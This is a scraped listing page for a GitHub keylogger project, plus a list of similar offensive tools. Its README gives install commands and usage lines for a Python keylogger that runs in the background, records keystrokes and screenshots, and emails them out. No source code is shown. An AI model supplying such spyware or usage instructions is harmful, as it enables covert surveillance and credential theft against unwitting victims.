All Projects → TrueBinary → SimpleKeylogger

TrueBinary / SimpleKeylogger

Licence: GPL-3.0 License
Simple Keylogger with smtp to send emails on your account using python works on linux and Windows

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to SimpleKeylogger

Crithit
Takes a single wordlist item and tests it one by one over a large collection of websites before moving onto the next. Create signatures to cross-check vulnerabilities over multiple hosts.
Stars: ✭ 182 (+468.75%)
Mutual labels:  infosec, pentesting, hacking-tool
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+2321.88%)
Mutual labels:  infosec, pentesting, hacking-tool
Cameradar
Cameradar hacks its way into RTSP videosurveillance cameras
Stars: ✭ 2,775 (+8571.88%)
Mutual labels:  infosec, pentesting, hacking-tool
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+2618.75%)
Mutual labels:  infosec, pentesting, hacking-tool
Dirsearch
Web path scanner
Stars: ✭ 7,246 (+22543.75%)
Mutual labels:  infosec, pentesting, hacking-tool
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+3450%)
Mutual labels:  infosec, pentesting, hacking-tool
aquatone
A Tool for Domain Flyovers
Stars: ✭ 43 (+34.38%)
Mutual labels:  infosec, hacking-tool
Hawkeye
Hawkeye filesystem analysis tool
Stars: ✭ 202 (+531.25%)
Mutual labels:  infosec, pentesting
Karma
Find leaked emails with your passwords
Stars: ✭ 154 (+381.25%)
Mutual labels:  email, infosec
Teardroid-phprat
🇮🇳 🤖 It's easy to use android botnet work without port forwarding, vps and android studio
Stars: ✭ 417 (+1203.13%)
Mutual labels:  keylogger, hacking-tool
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+437.5%)
Mutual labels:  infosec, pentesting
Mosint
An automated e-mail OSINT tool
Stars: ✭ 184 (+475%)
Mutual labels:  email, pentesting
Lo0sR
Lo0sR is a simple python Keylogger with many functions.
Stars: ✭ 48 (+50%)
Mutual labels:  keylogger, hacking-tool
Awesome Shodan Queries
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩‍💻
Stars: ✭ 2,758 (+8518.75%)
Mutual labels:  infosec, pentesting
Stegcloak
Hide secrets with invisible characters in plain text securely using passwords 🧙🏻‍♂️⭐
Stars: ✭ 2,379 (+7334.38%)
Mutual labels:  infosec, hacking-tool
Iky
OSINT Project
Stars: ✭ 203 (+534.38%)
Mutual labels:  email, infosec
awesome-ddos-tools
Collection of several DDos tools.
Stars: ✭ 75 (+134.38%)
Mutual labels:  infosec, hacking-tool
KeyLogger-WebService
"KeyLogger-WebService" Is a Keylogger Write In python.
Stars: ✭ 21 (-34.37%)
Mutual labels:  keylogger, hacking-tool
lit-bb-hack-tools
Little Bug Bounty & Hacking Tools⚔️
Stars: ✭ 180 (+462.5%)
Mutual labels:  infosec, hacking-tool
KeyLy
A powerfull and awesome Keylogger(Your keyboard and your mouse) realy helpfull for hackers! :-P (C/C++)
Stars: ✭ 17 (-46.87%)
Mutual labels:  keylogger, hacking-tool

icon

SimpleKeylogger

this is a simple keylogger written in Python using the pyxhook module which is an implementatation of pyhook module and the keylogger send to your email everything that keylogger got

What i will Need to you this Script ?

do you gonna need pyxhood and python-xlib the last one rest is pyscreenshot

How i install this libs ?

sample just copy and past in your terminal

pip install pyscreenshot pyxhook && sudo apt install python-xlib

How i use it on Linux ?

python keylogger.py --email "[email protected]" --password "example1234"

How i use it on Windows?

./keylogger.exe -e "[email protected]" -p "example1234" --local C:/anyware/Desktop/logs.txt

How to let the program running on background ?

this is a simple just run the program with & or on the end

Syntax

 --password is your password of your email
  
 --email is logic your email to send the logs 
  
 --local is the local where the program gonna save the logs and did will use to send the logs to your email

 --time is the time the Screenshots is will be sended to your email

Meta

@Mrtrue - [email protected] distributed under license GNU GENERAL PUBLIC LICENSE version 3 by Free Software Foundation, Inc. Read the original GPL v3.

Feature

  • take screenshot of window
  • Windows Version
  • Add UAC on Windows Version
  • Arguments and make a binare of the program
  • Make the program run in the background
  • Add the Pyinstaller

Contributing

  1. Fork it (https://github.com/TrueBinaru/SimpleKeyLogger/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request

How to use look at this tutorial

Tutorial

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].